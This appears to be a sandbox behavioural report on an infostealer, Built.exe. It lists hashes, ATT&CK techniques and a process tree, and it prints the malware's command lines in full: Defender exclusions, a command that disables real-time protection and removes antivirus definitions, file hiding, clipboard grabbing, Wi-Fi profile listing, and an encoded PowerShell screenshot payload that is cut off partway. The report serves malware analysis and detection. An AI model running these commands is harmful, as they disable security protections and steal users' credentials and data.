26926d6e7f9e847073ae1c08d63c0d644f3a6cb5b79a5616b36376e431e4336b

Resubmissions

24/01/2025, 23:11

250124-26rmzsvmgk 10

24/01/2025, 23:10

250124-25t2qavmbq 10

24/01/2025, 23:03

250124-21w1hsvkcr 10

Analysis

max time kernel
33s
max time network
34s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
24/01/2025, 23:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Built.exe
Size

6.9MB
MD5

faa6cb1809527998e2f98b222f74ca49
SHA1

8a259949d90da7821eccb7757233e1e423a1d5be
SHA256

26926d6e7f9e847073ae1c08d63c0d644f3a6cb5b79a5616b36376e431e4336b
SHA512

734455652f77df8e926ef33ea9b21e0863a08ebebbdf0341362c4f5f4ed980e0c5b5676034f718448dce92f2315b9284e3b7d44b19d86965721d3441823437b7
SSDEEP

98304:aKDjWM8JEE1FZ+QamaHl3Ne4i3Tf2PkOpfW9hZMMoVmkzhxIdfXeRiYRJJcGhEIw:aK0eeNTfm/pf+xk4dWRimrbW3jmyV

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
540	powershell.exe
4632	powershell.exe
4084	powershell.exe
1072	powershell.exe
2728	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Built.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
540	powershell.exe
4940	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
1408	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
396	Built.exe
396	Built.exe
396	Built.exe
396	Built.exe
396	Built.exe
396	Built.exe
396	Built.exe
396	Built.exe
396	Built.exe
396	Built.exe
396	Built.exe
396	Built.exe
396	Built.exe
396	Built.exe
396	Built.exe
396	Built.exe
396	Built.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
7	ip-api.com
21	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
4636	tasklist.exe
1760	tasklist.exe
4408	tasklist.exe
5080	tasklist.exe
1096	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1908	cmd.exe

UPX packed file 57 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023cbf-21.dat	upx
behavioral2/memory/396-25-0x00007FFF75EB0000-0x00007FFF76498000-memory.dmp	upx
behavioral2/memory/396-30-0x00007FFF89770000-0x00007FFF89794000-memory.dmp	upx
behavioral2/files/0x0007000000023cb1-40.dat	upx
behavioral2/memory/396-48-0x00007FFF8DFF0000-0x00007FFF8DFFF000-memory.dmp	upx
behavioral2/files/0x0007000000023cb9-47.dat	upx
behavioral2/files/0x0007000000023cb8-46.dat	upx
behavioral2/files/0x0007000000023cb7-45.dat	upx
behavioral2/files/0x0007000000023cb6-44.dat	upx
behavioral2/files/0x0007000000023cb5-43.dat	upx
behavioral2/files/0x0007000000023cb4-42.dat	upx
behavioral2/files/0x0007000000023cb3-41.dat	upx
behavioral2/files/0x0007000000023cc4-39.dat	upx
behavioral2/files/0x0007000000023cc3-38.dat	upx
behavioral2/files/0x0007000000023cc2-37.dat	upx
behavioral2/files/0x0007000000023cbe-34.dat	upx
behavioral2/files/0x0007000000023cbc-33.dat	upx
behavioral2/files/0x0007000000023cbd-29.dat	upx
behavioral2/files/0x0007000000023cb2-28.dat	upx
behavioral2/memory/396-54-0x00007FFF85540000-0x00007FFF8556D000-memory.dmp	upx
behavioral2/memory/396-56-0x00007FFF8B630000-0x00007FFF8B649000-memory.dmp	upx
behavioral2/memory/396-58-0x00007FFF85510000-0x00007FFF85533000-memory.dmp	upx
behavioral2/memory/396-60-0x00007FFF849E0000-0x00007FFF84B53000-memory.dmp	upx
behavioral2/memory/396-63-0x00007FFF850A0000-0x00007FFF850B9000-memory.dmp	upx
behavioral2/memory/396-64-0x00007FFF8B7C0000-0x00007FFF8B7CD000-memory.dmp	upx
behavioral2/memory/396-66-0x00007FFF830A0000-0x00007FFF830CE000-memory.dmp	upx
behavioral2/memory/396-68-0x00007FFF75EB0000-0x00007FFF76498000-memory.dmp	upx
behavioral2/memory/396-69-0x00007FFF80680000-0x00007FFF80738000-memory.dmp	upx
behavioral2/memory/396-72-0x00007FFF89770000-0x00007FFF89794000-memory.dmp	upx
behavioral2/memory/396-73-0x00007FFF75B30000-0x00007FFF75EA5000-memory.dmp	upx
behavioral2/memory/396-76-0x00007FFF81610000-0x00007FFF81624000-memory.dmp	upx
behavioral2/memory/396-78-0x00007FFF8A0A0000-0x00007FFF8A0AD000-memory.dmp	upx
behavioral2/memory/396-82-0x00007FFF7E550000-0x00007FFF7E66C000-memory.dmp	upx
behavioral2/memory/396-81-0x00007FFF849E0000-0x00007FFF84B53000-memory.dmp	upx
behavioral2/memory/396-80-0x00007FFF85510000-0x00007FFF85533000-memory.dmp	upx
behavioral2/memory/396-109-0x00007FFF850A0000-0x00007FFF850B9000-memory.dmp	upx
behavioral2/memory/396-214-0x00007FFF830A0000-0x00007FFF830CE000-memory.dmp	upx
behavioral2/memory/396-271-0x00007FFF80680000-0x00007FFF80738000-memory.dmp	upx
behavioral2/memory/396-273-0x00007FFF75B30000-0x00007FFF75EA5000-memory.dmp	upx
behavioral2/memory/396-289-0x00007FFF75EB0000-0x00007FFF76498000-memory.dmp	upx
behavioral2/memory/396-295-0x00007FFF849E0000-0x00007FFF84B53000-memory.dmp	upx
behavioral2/memory/396-290-0x00007FFF89770000-0x00007FFF89794000-memory.dmp	upx
behavioral2/memory/396-332-0x00007FFF850A0000-0x00007FFF850B9000-memory.dmp	upx
behavioral2/memory/396-339-0x00007FFF7E550000-0x00007FFF7E66C000-memory.dmp	upx
behavioral2/memory/396-336-0x00007FFF75B30000-0x00007FFF75EA5000-memory.dmp	upx
behavioral2/memory/396-338-0x00007FFF8A0A0000-0x00007FFF8A0AD000-memory.dmp	upx
behavioral2/memory/396-337-0x00007FFF81610000-0x00007FFF81624000-memory.dmp	upx
behavioral2/memory/396-335-0x00007FFF80680000-0x00007FFF80738000-memory.dmp	upx
behavioral2/memory/396-334-0x00007FFF830A0000-0x00007FFF830CE000-memory.dmp	upx
behavioral2/memory/396-333-0x00007FFF8B7C0000-0x00007FFF8B7CD000-memory.dmp	upx
behavioral2/memory/396-328-0x00007FFF85540000-0x00007FFF8556D000-memory.dmp	upx
behavioral2/memory/396-342-0x00007FFF8DFF0000-0x00007FFF8DFFF000-memory.dmp	upx
behavioral2/memory/396-341-0x00007FFF89770000-0x00007FFF89794000-memory.dmp	upx
behavioral2/memory/396-340-0x00007FFF75EB0000-0x00007FFF76498000-memory.dmp	upx
behavioral2/memory/396-331-0x00007FFF849E0000-0x00007FFF84B53000-memory.dmp	upx
behavioral2/memory/396-330-0x00007FFF85510000-0x00007FFF85533000-memory.dmp	upx
behavioral2/memory/396-329-0x00007FFF8B630000-0x00007FFF8B649000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
880	PING.EXE
392	cmd.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
728	cmd.exe
1476	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1960	WMIC.exe
5048	WMIC.exe
4640	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4648	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
880	PING.EXE

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
540	powershell.exe
1072	powershell.exe
1072	powershell.exe
540	powershell.exe
2728	powershell.exe
2728	powershell.exe
540	powershell.exe
540	powershell.exe
4920	powershell.exe
4920	powershell.exe
540	powershell.exe
4920	powershell.exe
4632	powershell.exe
4632	powershell.exe
4484	powershell.exe
4484	powershell.exe
4084	powershell.exe
4084	powershell.exe
5012	powershell.exe
5012	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4636	tasklist.exe
Token: SeDebugPrivilege	540	powershell.exe
Token: SeIncreaseQuotaPrivilege	1224	WMIC.exe
Token: SeSecurityPrivilege	1224	WMIC.exe
Token: SeTakeOwnershipPrivilege	1224	WMIC.exe
Token: SeLoadDriverPrivilege	1224	WMIC.exe
Token: SeSystemProfilePrivilege	1224	WMIC.exe
Token: SeSystemtimePrivilege	1224	WMIC.exe
Token: SeProfSingleProcessPrivilege	1224	WMIC.exe
Token: SeIncBasePriorityPrivilege	1224	WMIC.exe
Token: SeCreatePagefilePrivilege	1224	WMIC.exe
Token: SeBackupPrivilege	1224	WMIC.exe
Token: SeRestorePrivilege	1224	WMIC.exe
Token: SeShutdownPrivilege	1224	WMIC.exe
Token: SeDebugPrivilege	1224	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1224	WMIC.exe
Token: SeRemoteShutdownPrivilege	1224	WMIC.exe
Token: SeUndockPrivilege	1224	WMIC.exe
Token: SeManageVolumePrivilege	1224	WMIC.exe
Token: 33	1224	WMIC.exe
Token: 34	1224	WMIC.exe
Token: 35	1224	WMIC.exe
Token: 36	1224	WMIC.exe
Token: SeDebugPrivilege	1072	powershell.exe
Token: SeIncreaseQuotaPrivilege	1224	WMIC.exe
Token: SeSecurityPrivilege	1224	WMIC.exe
Token: SeTakeOwnershipPrivilege	1224	WMIC.exe
Token: SeLoadDriverPrivilege	1224	WMIC.exe
Token: SeSystemProfilePrivilege	1224	WMIC.exe
Token: SeSystemtimePrivilege	1224	WMIC.exe
Token: SeProfSingleProcessPrivilege	1224	WMIC.exe
Token: SeIncBasePriorityPrivilege	1224	WMIC.exe
Token: SeCreatePagefilePrivilege	1224	WMIC.exe
Token: SeBackupPrivilege	1224	WMIC.exe
Token: SeRestorePrivilege	1224	WMIC.exe
Token: SeShutdownPrivilege	1224	WMIC.exe
Token: SeDebugPrivilege	1224	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1224	WMIC.exe
Token: SeRemoteShutdownPrivilege	1224	WMIC.exe
Token: SeUndockPrivilege	1224	WMIC.exe
Token: SeManageVolumePrivilege	1224	WMIC.exe
Token: 33	1224	WMIC.exe
Token: 34	1224	WMIC.exe
Token: 35	1224	WMIC.exe
Token: 36	1224	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4640	WMIC.exe
Token: SeSecurityPrivilege	4640	WMIC.exe
Token: SeTakeOwnershipPrivilege	4640	WMIC.exe
Token: SeLoadDriverPrivilege	4640	WMIC.exe
Token: SeSystemProfilePrivilege	4640	WMIC.exe
Token: SeSystemtimePrivilege	4640	WMIC.exe
Token: SeProfSingleProcessPrivilege	4640	WMIC.exe
Token: SeIncBasePriorityPrivilege	4640	WMIC.exe
Token: SeCreatePagefilePrivilege	4640	WMIC.exe
Token: SeBackupPrivilege	4640	WMIC.exe
Token: SeRestorePrivilege	4640	WMIC.exe
Token: SeShutdownPrivilege	4640	WMIC.exe
Token: SeDebugPrivilege	4640	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4640	WMIC.exe
Token: SeRemoteShutdownPrivilege	4640	WMIC.exe
Token: SeUndockPrivilege	4640	WMIC.exe
Token: SeManageVolumePrivilege	4640	WMIC.exe
Token: 33	4640	WMIC.exe
Token: 34	4640	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2268 wrote to memory of 396	2268	Built.exe	83
PID 2268 wrote to memory of 396	2268	Built.exe	83
PID 396 wrote to memory of 2424	396	Built.exe	84
PID 396 wrote to memory of 2424	396	Built.exe	84
PID 396 wrote to memory of 60	396	Built.exe	85
PID 396 wrote to memory of 60	396	Built.exe	85
PID 396 wrote to memory of 3688	396	Built.exe	86
PID 396 wrote to memory of 3688	396	Built.exe	86
PID 396 wrote to memory of 4272	396	Built.exe	90
PID 396 wrote to memory of 4272	396	Built.exe	90
PID 3688 wrote to memory of 4636	3688	cmd.exe	92
PID 3688 wrote to memory of 4636	3688	cmd.exe	92
PID 60 wrote to memory of 540	60	cmd.exe	93
PID 60 wrote to memory of 540	60	cmd.exe	93
PID 2424 wrote to memory of 1072	2424	cmd.exe	94
PID 2424 wrote to memory of 1072	2424	cmd.exe	94
PID 4272 wrote to memory of 1224	4272	cmd.exe	95
PID 4272 wrote to memory of 1224	4272	cmd.exe	95
PID 396 wrote to memory of 4008	396	Built.exe	97
PID 396 wrote to memory of 4008	396	Built.exe	97
PID 4008 wrote to memory of 3792	4008	cmd.exe	99
PID 4008 wrote to memory of 3792	4008	cmd.exe	99
PID 396 wrote to memory of 4972	396	Built.exe	100
PID 396 wrote to memory of 4972	396	Built.exe	100
PID 4972 wrote to memory of 4992	4972	cmd.exe	145
PID 4972 wrote to memory of 4992	4972	cmd.exe	145
PID 396 wrote to memory of 4520	396	Built.exe	103
PID 396 wrote to memory of 4520	396	Built.exe	103
PID 4520 wrote to memory of 4640	4520	cmd.exe	105
PID 4520 wrote to memory of 4640	4520	cmd.exe	105
PID 396 wrote to memory of 2428	396	Built.exe	106
PID 396 wrote to memory of 2428	396	Built.exe	106
PID 2428 wrote to memory of 1960	2428	cmd.exe	108
PID 2428 wrote to memory of 1960	2428	cmd.exe	108
PID 396 wrote to memory of 1908	396	Built.exe	109
PID 396 wrote to memory of 1908	396	Built.exe	109
PID 396 wrote to memory of 1944	396	Built.exe	110
PID 396 wrote to memory of 1944	396	Built.exe	110
PID 1944 wrote to memory of 2728	1944	cmd.exe	113
PID 1944 wrote to memory of 2728	1944	cmd.exe	113
PID 1908 wrote to memory of 2664	1908	cmd.exe	158
PID 1908 wrote to memory of 2664	1908	cmd.exe	158
PID 396 wrote to memory of 1472	396	Built.exe	115
PID 396 wrote to memory of 1472	396	Built.exe	115
PID 396 wrote to memory of 3588	396	Built.exe	116
PID 396 wrote to memory of 3588	396	Built.exe	116
PID 1472 wrote to memory of 1760	1472	cmd.exe	119
PID 1472 wrote to memory of 1760	1472	cmd.exe	119
PID 3588 wrote to memory of 4408	3588	cmd.exe	120
PID 3588 wrote to memory of 4408	3588	cmd.exe	120
PID 396 wrote to memory of 4940	396	Built.exe	121
PID 396 wrote to memory of 4940	396	Built.exe	121
PID 396 wrote to memory of 4896	396	Built.exe	122
PID 396 wrote to memory of 4896	396	Built.exe	122
PID 396 wrote to memory of 4404	396	Built.exe	125
PID 396 wrote to memory of 4404	396	Built.exe	125
PID 396 wrote to memory of 3864	396	Built.exe	126
PID 396 wrote to memory of 3864	396	Built.exe	126
PID 396 wrote to memory of 728	396	Built.exe	129
PID 396 wrote to memory of 728	396	Built.exe	129
PID 4896 wrote to memory of 2108	4896	cmd.exe	130
PID 4896 wrote to memory of 2108	4896	cmd.exe	130
PID 396 wrote to memory of 4492	396	Built.exe	132
PID 396 wrote to memory of 4492	396	Built.exe	132

Views/modifies file attributes 1 TTPs 3 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3356	attrib.exe
2664	attrib.exe
2664	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2268
- C:\Users\Admin\AppData\Local\Temp\Built.exe
  "C:\Users\Admin\AppData\Local\Temp\Built.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2424
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:60
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3688
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4272
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4008
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:3792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4972
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:4992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4520
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:4640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2428
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:1908
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe"
      4⤵
      Views/modifies file attributes
      PID:2664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‌.scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1944
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‌.scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1472
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3588
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:4940
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4896
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:2108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4404
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3864
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:5080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:728
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:4492
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAf